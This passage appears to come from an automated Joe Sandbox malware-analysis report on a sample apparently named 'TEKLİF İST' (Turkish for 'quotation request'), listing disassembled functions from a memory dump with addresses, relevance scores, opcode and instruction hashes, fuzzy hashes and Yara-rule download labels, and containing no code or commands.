                                                                                                              • Opcode ID: 736d47bbf4368ed06d495268759128501445e7b0f6642068cf12a42f757c9bc1
                                                                                                              • Instruction ID: 2726ebad00125a08928b82058e8890bf5f31f63c3791821b2be8f6f7e850c1c6
                                                                                                              • Opcode Fuzzy Hash: 736d47bbf4368ed06d495268759128501445e7b0f6642068cf12a42f757c9bc1
                                                                                                              • Instruction Fuzzy Hash: 8B32D0B0A087558BDB2DCF69C8447BEBBF2FF84704F58419EE9869B285D735A801CB50
                                                                                                              Function 01BEA118 Relevance: .6, Instructions: 591COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8269d2d2045963c5b3d90555082b38c89561a5589218f533ec2300676f4d7fd
                                                                                                              • Instruction ID: 3a0d2a4fda1149e82175e03ab2441fcc8f738e973027c5270d52374b0ec16573
                                                                                                              • Opcode Fuzzy Hash: e8269d2d2045963c5b3d90555082b38c89561a5589218f533ec2300676f4d7fd
                                                                                                              • Instruction Fuzzy Hash: 0222AD742046618FEB29CF39C098372BBF9EF45340F0885DAE9968F286D735E452DB61
                                                                                                              Function 01B68DBF Relevance: .6, Instructions: 554COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b0ff3e98eeb09db7d292f24068eaa3cf9412f25e5d92511963f1b18f0fde6620
                                                                                                              • Instruction ID: 5a957440aeebceb3c64ed0817e19d44e6d9780ca861c80e036529fb5d25d0275
                                                                                                              • Opcode Fuzzy Hash: b0ff3e98eeb09db7d292f24068eaa3cf9412f25e5d92511963f1b18f0fde6620
                                                                                                              • Instruction Fuzzy Hash: 2D225C70E0421ADBCF19CF99C4809BEFBF6FF58704B54859AE9459B241E738D941CBA0
                                                                                                              Function 01B46A50 Relevance: .5, Instructions: 548COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 175ee93a4a494d81c79cee43dd3940989613bb35edcea67bb2a5c64652e459fc
                                                                                                              • Instruction ID: f904b8b88d18a7b2c078c693190d4d51b9aa2a4a4ac1dbe1da6bff409a993da9
                                                                                                              • Opcode Fuzzy Hash: 175ee93a4a494d81c79cee43dd3940989613bb35edcea67bb2a5c64652e459fc
                                                                                                              • Instruction Fuzzy Hash: E2329B71A05205DFDB69CF6CC480BAABBF1FF49300F1486A9E956AB391DB34E841DB50
                                                                                                              Function 01B64A35 Relevance: .4, Instructions: 423COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction ID: b0f0f9a9b5ef1e420dfa9372fa189e238897c0cbd973a960b18765131fdf7af0
                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction Fuzzy Hash: DEF16E71E0060A9BDF19CF99D580BAEBBF9EF58710F0881A9E915AB344E778DC41CB50
                                                                                                              Function 01BD892B Relevance: .4, Instructions: 386COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d10e1dce003e6c12d73771cd8c540e977b4a16cf19129164e7dd204853e52119
                                                                                                              • Instruction ID: 4532c487c8bfcd3851fc86925bab28eedb0eae5a604c8c8ec88b6b646e8f19b8
                                                                                                              • Opcode Fuzzy Hash: d10e1dce003e6c12d73771cd8c540e977b4a16cf19129164e7dd204853e52119
                                                                                                              • Instruction Fuzzy Hash: 58D1F171A0060A9BDF0DCF69C841BBEBBF1EF88306F1981A9D955E7241E735E905CB60
                                                                                                              Function 01B465D0 Relevance: .4, Instructions: 383COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 854ea0dae7c7c029824a7e3188704009c7ff679d0df9d94d2c08813a0721e784
                                                                                                              • Instruction ID: f1f6ac9a227131de434627185a0f5cde4c866f3aad747a7a99c2cad38f49b7fa
                                                                                                              • Opcode Fuzzy Hash: 854ea0dae7c7c029824a7e3188704009c7ff679d0df9d94d2c08813a0721e784
                                                                                                              • Instruction Fuzzy Hash: ABE17E75508342CFC719CF28C490A6ABBE0FF8A314F058AADF99587351EB31E905DB92
                                                                                                              Function 01B38397 Relevance: .4, Instructions: 380COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bccc60d8ee0c78abbc7a26f15eab903b14985691af5d12418052980b2a85af76
                                                                                                              • Instruction ID: 667190d723df0582425cddfbdebf55e3cc20be64a7815a6e28c0a1370c63b772
                                                                                                              • Opcode Fuzzy Hash: bccc60d8ee0c78abbc7a26f15eab903b14985691af5d12418052980b2a85af76
                                                                                                              • Instruction Fuzzy Hash: 7CD1CF71A00206DBDF1DDF68D990EBAB7A5FF94204F0543A9F916DB280E730E961CB91
                                                                                                              Function 01BC8243 Relevance: .3, Instructions: 322COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction ID: 44aa9fae886cf60b97ff1a5a1e33500ec13862b7f8498f51412e70031d2e3584
                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction Fuzzy Hash: 5FB16774A006059FDF28DF99C944EAFBBBAFF84704F14449EAA429B790DB74E905CB10
                                                                                                              Function 01B50535 Relevance: .3, Instructions: 300COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction ID: e9a36449193240df190974455ac83b24fec459c797d54fc77c0bc79057511ef9
                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction Fuzzy Hash: 94B1F731604646AFDF2DEB68C890BBEBBF6EF44304F1805D9EA5697281D770D941CB50
                                                                                                              Function 01B483C0 Relevance: .3, Instructions: 281COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 15e132b2a17a2407feb085a8c5902d0efc5638ef2ca2fdd091e3cb1c729f0492
                                                                                                              • Instruction ID: ea4d37c10aa663edeb093ed81dbdb231c126f304b3c8abac7780a49390ec1f93
                                                                                                              • Opcode Fuzzy Hash: 15e132b2a17a2407feb085a8c5902d0efc5638ef2ca2fdd091e3cb1c729f0492
                                                                                                              • Instruction Fuzzy Hash: 9CC158745083418FD768CF59C494BAAB7E5FF88304F4489ADE9898B291E774E908CF92
                                                                                                              Function 01B3C427 Relevance: .3, Instructions: 280COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a44afdb3189ad9cf68b59ca72f391d706ec0441dd1106f0c7f1cf0f10407cc67
                                                                                                              • Instruction ID: 26ad678e9476f9ee12c1f26956fd03c7d2590558a67d5a2883a7563d10d0daef
                                                                                                              • Opcode Fuzzy Hash: a44afdb3189ad9cf68b59ca72f391d706ec0441dd1106f0c7f1cf0f10407cc67
                                                                                                              • Instruction Fuzzy Hash: 0CB18670A002658BDB79DF68C890BA9B7F5EF84700F1585EAD50AE7291DB30DD86CF20
                                                                                                              Function 01B6E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 18c3c0c48da5ccf1d9d75409a547ee6dbb099e78d71d11a964c12d6640f570cf
                                                                                                              • Instruction ID: 97a605f0ac90b42af39c61b83b26bd750c6f0997538d87904f62f80eb895ae25
                                                                                                              • Opcode Fuzzy Hash: 18c3c0c48da5ccf1d9d75409a547ee6dbb099e78d71d11a964c12d6640f570cf
                                                                                                              • Instruction Fuzzy Hash: 89A10735E04615AFEF29DB58C844BFDBBB8EB10754F0502E9EA01AB291D778DD40CB91
                                                                                                              Function 01B80185 Relevance: .3, Instructions: 276COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d046ea72a1d09e7f18fc15ae63decaa2bb0b03251b841e9a73832ce62725f865
                                                                                                              • Instruction ID: 6bbf23a0146802c487b1ac2997ca8dc69b9557dae612601f797a838a98a2fd8e
                                                                                                              • Opcode Fuzzy Hash: d046ea72a1d09e7f18fc15ae63decaa2bb0b03251b841e9a73832ce62725f865
                                                                                                              • Instruction Fuzzy Hash: BFA1F270B006169FDB2CEF69C990BBAB7B1FF54754F0441A9FA0697281EB74E805CB90
                                                                                                              Function 01C14500 Relevance: .3, Instructions: 275COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c3e914da5a19e7acd103f7bf4ba41b659d411d73f6b60caac378588de9c568f0
                                                                                                              • Instruction ID: 90710aaee2fcd85ad308eab1a7d2d8b4e4985c454373c650c7388432ca7fb1f7
                                                                                                              • Opcode Fuzzy Hash: c3e914da5a19e7acd103f7bf4ba41b659d411d73f6b60caac378588de9c568f0
                                                                                                              • Instruction Fuzzy Hash: 20A1F072A40212EFDB2ADF18C980B1ABBE9FF49744F040968F945DB654C330EE01DB91
                                                                                                              Function 01BC60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d9e8fba988ecfba6e6dadd16e40320fb76aa145684cc46c40469b7766083b3dd
                                                                                                              • Instruction ID: cf7b694150e620aabdf02158d115e5fbcfa4f739cb119c02b274baddc115d2da
                                                                                                              • Opcode Fuzzy Hash: d9e8fba988ecfba6e6dadd16e40320fb76aa145684cc46c40469b7766083b3dd
                                                                                                              • Instruction Fuzzy Hash: D6916271E00216AFDF19CFA9D894FAEBBB5EB48B10F1541ADE610EB351D734D9009BA0
                                                                                                              Function 01B5E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 957e230d566f7210adcea259a951a59d6e3f277dcef6b972bd0187de458fdc17
                                                                                                              • Instruction ID: 602365a2b66fabd219348d505e8f49efe57f1dbf9fb3d3718fa77ad5b0725c7d
                                                                                                              • Opcode Fuzzy Hash: 957e230d566f7210adcea259a951a59d6e3f277dcef6b972bd0187de458fdc17
                                                                                                              • Instruction Fuzzy Hash: A1912731A00616DBEB6DDB68D480B7EBBB2EF94758F0541EAED059B340E734DA01C761
                                                                                                              Function 01B96ACC Relevance: .2, Instructions: 226COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d96e6e081dc5b23a5f44bb28448b60ee37386b5b8e68f9cb502e501332bf649
                                                                                                              • Instruction ID: 2f2f222cc4642e45c5449c9f8f20c4b9f4e9b18fa6633bb2b8e91bd3b86372d5
                                                                                                              • Opcode Fuzzy Hash: 8d96e6e081dc5b23a5f44bb28448b60ee37386b5b8e68f9cb502e501332bf649
                                                                                                              • Instruction Fuzzy Hash: 8D819071A0061A9BDF28CF69C940ABEBBF9FB48700F14857EE455D7640E734D941CBA4
                                                                                                              Function 01C0AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction ID: 69655d1b4c0cbe02efe7afcb8e2d499c0fcd19fa5b5049b594b94832db29330a
                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction Fuzzy Hash: AC818071A10705DFDF1ACF99C490AAEBBF2BF84310F198569D9169B384DB34EA01CB40
                                                                                                              Function 01B7E284 Relevance: .2, Instructions: 212COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1cfb2e4438642e9d9e36642f6e26136a96f0a431c914da6a6c64094c8a831c0f
                                                                                                              • Instruction ID: 6ec85429ea04796ac6f12e87bf40a4743894ad9f6132e68542544c9346b53e61
                                                                                                              • Opcode Fuzzy Hash: 1cfb2e4438642e9d9e36642f6e26136a96f0a431c914da6a6c64094c8a831c0f
                                                                                                              • Instruction Fuzzy Hash: 84818F71A00609AFDB2ADFA8C880BEEBBF9FF48314F1044A9E555A7250D770EC05DB60
                                                                                                              Function 01B5C640 Relevance: .2, Instructions: 206COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 04e618d681c73138e2a6807cfac4954a86e0319d90182edbf66a9e306d9bb10a
                                                                                                              • Instruction ID: b1b4d7826ce784261839405019332db1f59b31bf4c70e97e234e2e6723032644
                                                                                                              • Opcode Fuzzy Hash: 04e618d681c73138e2a6807cfac4954a86e0319d90182edbf66a9e306d9bb10a
                                                                                                              • Instruction Fuzzy Hash: 3771EF75D04265DBCB29CF58D8907BEBFB9FF58710F14429AE992AB750D3349900CBA0
                                                                                                              Function 01BF47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2983dfec769a016d95e1fd609730276b09460aec6e25ff6b9ec5604d6af1cf15
                                                                                                              • Instruction ID: b5c1558997545f413d2a6e67a8073cf4ebd57b4bdd1ddb5889c34226fbbdedf9
                                                                                                              • Opcode Fuzzy Hash: 2983dfec769a016d95e1fd609730276b09460aec6e25ff6b9ec5604d6af1cf15
                                                                                                              • Instruction Fuzzy Hash: 46718F71A00215EFDB28DFA9D944A9BBBF8EB90700F00919EE705A7258C731CA48CF64
                                                                                                              Function 01B5260B Relevance: .2, Instructions: 201COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 393639df4e15422dc51b65cc1f439b05b4f1c6f756cd6fac6ed1e4266e528cbb
                                                                                                              • Instruction ID: 4eff5f55562e51a8eaa7094d6b850716b20a27accae5057b206fccd3b38a1532
                                                                                                              • Opcode Fuzzy Hash: 393639df4e15422dc51b65cc1f439b05b4f1c6f756cd6fac6ed1e4266e528cbb
                                                                                                              • Instruction Fuzzy Hash: 22719D76605242DFD759DF28C480B2AB7E5FF84310F0885E9E8958B352DB34DC46CBA1
                                                                                                              Function 01BC035C Relevance: .2, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction ID: c6f6dd12729d9a8670e3c8a0b6a5a8d6d0b068c24f59909a4ddc3acca2636533
                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction Fuzzy Hash: 56716D75A00619EFDF14EFA9C984AAEBBF9FF58700F1045A9E905A7250DB34EA01CB50
                                                                                                              Function 01BD62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ed41bc94f2a60f96f09218d48034118c04a8012de911b7e96478d3aa676d9fda
                                                                                                              • Instruction ID: 69d6818ea3f1846b92fa995c7cb57005befa25d1735f33dcf1b4d670024b8861
                                                                                                              • Opcode Fuzzy Hash: ed41bc94f2a60f96f09218d48034118c04a8012de911b7e96478d3aa676d9fda
                                                                                                              • Instruction Fuzzy Hash: F871E332200701AFEB3EDF18C884F5ABBE6FF44760F1545A8E656872A0EB75E944CB50
                                                                                                              Function 01B48AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1822e024cc9061437d6425b4607400028b7f77df8d3c0f50c4838fc8a675acd9
                                                                                                              • Instruction ID: 9d14f0b47a91968bf77987bb7fe0e64f8200136e3ee89affa5c7199f199fa902
                                                                                                              • Opcode Fuzzy Hash: 1822e024cc9061437d6425b4607400028b7f77df8d3c0f50c4838fc8a675acd9
                                                                                                              • Instruction Fuzzy Hash: 3181AD72A083068FDB2CCF98D584BADB7B2FB58314F5982E9D901AB281C775DD40DB90
                                                                                                              Function 01B7CDB1 Relevance: .2, Instructions: 197COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e7c504f2caddf2bf819ef2184c1866cb040ffd5814aa8db9047dbf9d9714ac9b
                                                                                                              • Instruction ID: 9ab708289b97fba622fc55898a414f751bcc730b76a8c284c67c08e9982ebc2b
                                                                                                              • Opcode Fuzzy Hash: e7c504f2caddf2bf819ef2184c1866cb040ffd5814aa8db9047dbf9d9714ac9b
                                                                                                              • Instruction Fuzzy Hash: FA615A71A002069FDF1DDF68C890BBEBBB9FF58314F1445A9E622AB291DB719901CB50
                                                                                                              Function 01BFA250 Relevance: .2, Instructions: 184COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bda17861f0aebc5055a007e562d33b87d35f792495549f8e7a136882017973bd
                                                                                                              • Instruction ID: 219245fb64bd5b897796cdae6fef60b7e23eca46263526005e1ed3520333d35e
                                                                                                              • Opcode Fuzzy Hash: bda17861f0aebc5055a007e562d33b87d35f792495549f8e7a136882017973bd
                                                                                                              • Instruction Fuzzy Hash: 9751CF72504612AFDB1ADE78C894B5BBBE8EBC4B50F0109ADBB44DB150D770ED09C7A2
                                                                                                              Function 01BE8350 Relevance: .2, Instructions: 161COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b5aa89cbe89134e5345f3e8d4d92fb6b090f34d9b3d0a87597e664b0f3e65949
                                                                                                              • Instruction ID: 97231e85faa825f662f60e3ee1d8e648aead010d84cfb2f2f36571ef9744c8ab
                                                                                                              • Opcode Fuzzy Hash: b5aa89cbe89134e5345f3e8d4d92fb6b090f34d9b3d0a87597e664b0f3e65949
                                                                                                              • Instruction Fuzzy Hash: 4551C170900B05DFDB29DF6AC888A6BFBF8FF54710F10465EE252576A0D7B0A545CB90
                                                                                                              Function 01B7E443 Relevance: .2, Instructions: 158COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
